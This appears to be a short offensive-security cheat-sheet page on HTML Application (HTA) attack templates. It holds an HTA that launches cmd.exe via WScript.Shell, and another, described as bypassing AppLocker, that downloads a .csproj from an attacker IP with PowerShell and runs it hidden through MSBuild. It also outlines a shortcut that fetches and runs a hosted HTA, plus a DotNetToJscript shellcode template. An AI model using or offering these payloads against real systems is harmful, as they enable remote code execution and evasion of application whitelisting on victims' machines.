HTA

Simple code template:

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

This will be beneficial for bypassing AppLocker

<html>
<body>
<script>
	var c= "powershell iwr http://192.168.19.134/pwsh.csproj -OutFile C:\\Windows\\Tasks\\pwsh.csproj;powershell -w hidden C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe /nologo /noconsolelogger C:\\Windows\\Tasks\\pwsh.csproj";
	new ActiveXObject('WScript.Shell').Run(c);window.close();
</script>
</body>
</html>

Shortcut

Create a shortcut that downloads and executes a hosting hta file when user clicked.

DotNetToJscript with HTA

<html> 
<head> 
<script language="JScript">
DotNetToJscript - SHELLCODE
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>

Last updated